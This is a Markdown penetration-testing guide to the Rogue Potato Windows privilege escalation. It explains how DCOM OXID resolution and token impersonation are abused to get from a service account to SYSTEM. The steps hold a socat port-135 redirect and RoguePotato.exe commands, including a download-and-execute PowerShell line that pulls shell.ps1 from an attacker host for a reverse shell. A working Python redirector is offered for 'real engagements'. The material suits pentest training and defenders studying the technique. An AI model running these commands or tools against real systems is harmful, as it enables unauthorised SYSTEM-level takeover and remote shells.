# Rogue Potato

### Overview

**Rogue Potato** is a **Windows local privilege escalation technique** that abuses **DCOM activation, OXID resolution and token impersonation** to escalate from a **low-privileged service account** holding `SeImpersonatePrivilege` (or `SeAssignPrimaryTokenPrivilege`) to **NT AUTHORITY\SYSTEM**.

It is part of the **“Potato” attack family** and was written to get around the change in **Windows 10 1809 / Windows Server 2019** that broke **Juicy Potato**: on those builds the DCOM OXID resolution only talks to **port 135**, which RPCSS already owns on the victim, so Juicy Potato's local fake resolver on another port is never contacted. Rogue Potato instead points the resolution at an **attacker-controlled host's port 135** and forwards it back to the victim.

### Why Rogue Potato Works

A service account that holds `SeImpersonatePrivilege` (or `SeAssignPrimaryTokenPrivilege`) is allowed to:

* **Impersonate clients** that connect to it, for example over a named pipe
* **Run a new process under the impersonated token**

Rogue Potato:

1. Triggers a **DCOM activation** whose object reference points the **OXID resolver** at the attacker's host on **port 135**
2. The attacker's host **forwards that connection back to the victim**, where the tool's **Rogue OXID Resolver** is listening (port 9999 in the steps below)
3. The rogue resolver answers with a binding to a **named pipe the tool controls**; the **SYSTEM DCOM service connects to that pipe**
4. The tool **impersonates the pipe client** and obtains a **SYSTEM token**
5. It executes the attacker-supplied command under that token

### Prerequisites

1. Local code execution on the victim
2. The current token must hold **at least one** of:
   * `SeImpersonatePrivilege` ✅ (most common)
   * `SeAssignPrimaryTokenPrivilege`
3. Identities that typically hold them:
   * IIS AppPool identity
   * MSSQL service account
   * Any service account with impersonation rights
4. A machine under your control that the victim can reach on **TCP port 135**; it forwards that port back to the rogue OXID resolver running on the victim.
5. The remote redirect is what makes this work on **Windows 10 1809 / Windows Server 2019 and later**, where Juicy Potato's local fake resolver is no longer contacted.

### Steps

1. Check token privileges (`SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` must be listed; `Disabled` in the State column only means the privilege is not enabled in the current process, the token still holds it):

   ```bash
   whoami /priv
   ```
2. Upload `RoguePotato.exe` to the victim machine.
3. On the Kali box, start `socat` listening on TCP 135 and forwarding back to the victim on TCP 9999. Binding port 135 needs root, so run it with `sudo`; the forwarded port must match the `-l` value used in the next step.

   ```bash
   sudo socat tcp-listen:135,reuseaddr,fork tcp:<VICTIM_IP>:9999
   ```
4. Execute Rogue Potato. Start with a command whose effect you can observe (a ping back to the attacker) and confirm the ICMP echo requests arrive before switching to the reverse shell:

   ```powershell
   # -r <ATTACKER_IP> - required; the host running the port-135 redirect
   # -l 9999          - port the RogueOxidResolver listens on locally (must match the socat target port)
   # -e "<command>"   - the command to run as SYSTEM
   .\RoguePotato.exe -r <ATTACKER_IP> -e "cmd.exe /c ping <ATTACKER_IP>" -l 9999

   # Reverse shell: serve shell.ps1 over HTTP from the attacker machine and start a listener there first.
   .\RoguePotato.exe -r <ATTACKER_IP> -e "powershell -c iex( iwr http://<ATTACKER_IP>/shell.ps1 -UseBasicParsing )" -l 9999
   ```
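The attacker-side helpers below are an added example, not code from the RoguePotato project or the referenced write-ups. They cover two of the steps above: the privilege check of step 1 (parsing a pasted `whoami /priv` listing for the two usable privileges) and the redirect of step 3 (a Python stand-in for the `socat` command that forwards the attacker's port 135 to the victim's rogue OXID resolver). The `whoami /priv` sample is constructed, the echo server only stands in for the victim's port 9999 so the redirect can be exercised offline, and the regex assumes English `whoami` output.

```python
"""Attacker-side helpers for the Rogue Potato steps above (added example, not RoguePotato code)."""
import re
import socket
import threading

# Constructed `whoami /priv` listing for an IIS AppPool identity (not a real capture).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

POTATO_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")
_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def impersonation_privileges(whoami_priv_output):
    """Step 1: {privilege: state} for the privileges Rogue Potato can use; empty means no-go.
    'Disabled' only says the privilege is not enabled in this process; the token still holds it."""
    found = {}
    for line in whoami_priv_output.splitlines():
        m = _PRIV_LINE.match(line)
        if m and m.group(1) in POTATO_PRIVS:
            found[m.group(1)] = m.group(2)
    return found


def _pump(src, dst):
    """Copy bytes src -> dst until either side closes, then shut both sockets down."""
    try:
        while data := src.recv(65536):
            dst.sendall(data)
    except OSError:
        pass
    for s in (src, dst):
        try:
            s.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass


class Redirector:
    """Step 3 without socat: like `socat tcp-listen:LISTEN,reuseaddr,fork tcp:TARGET_HOST:TARGET_PORT`.
    Each connection accepted on listen_port (135 in the real attack) is forwarded to the
    victim's RogueOxidResolver on target_port (9999 in the steps above)."""

    def __init__(self, target_host, target_port, listen_host="0.0.0.0", listen_port=135):
        self.target = (target_host, target_port)
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind((listen_host, listen_port))
        self._srv.listen(16)
        self.listen_port = self._srv.getsockname()[1]  # actual port when 0 was requested
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self._srv.accept()
            except OSError:  # listener closed
                return
            threading.Thread(target=self._relay, args=(client,), daemon=True).start()

    def _relay(self, client):
        try:
            upstream = socket.create_connection(self.target, timeout=5)
        except OSError:  # victim port unreachable: drop this client, keep listening
            client.close()
            return
        upstream.settimeout(None)  # connect timeout only; relaying must block indefinitely
        threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
        _pump(client, upstream)

    def close(self):
        self._srv.close()


def _start_echo_server():
    """Stand-in for the victim's port 9999 in the demo (constructed): echoes whatever it gets."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while data := conn.recv(65536):
                conn.sendall(data)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo_redirect(payload=b"constructed OXID resolve request"):
    """Round-trip payload client -> Redirector -> echo 'victim' and return what came back."""
    redirector = Redirector("127.0.0.1", _start_echo_server(), listen_host="127.0.0.1", listen_port=0)
    try:
        with socket.create_connection(("127.0.0.1", redirector.listen_port), timeout=5) as c:
            c.sendall(payload)
            return c.recv(65536)
    finally:
        redirector.close()
```

In a real engagement the redirector is started on the attacker box as `Redirector("<VICTIM_IP>", 9999)` from a root shell, since binding port 135 needs it, and left running while `RoguePotato.exe -r <ATTACKER_IP> -l 9999 ...` executes on the victim; `impersonation_privileges` is fed the text of `whoami /priv` copied from the victim. Each accepted connection gets its own relay thread, matching the `fork` option in the `socat` line, so a failed or slow activation attempt does not block the next one.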

### References

1. <https://github.com/antonioCoco/RoguePotato>
2. <https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html>
3. <https://jlajara.gitlab.io/Potatoes_Windows_Privesc#roguePotato>

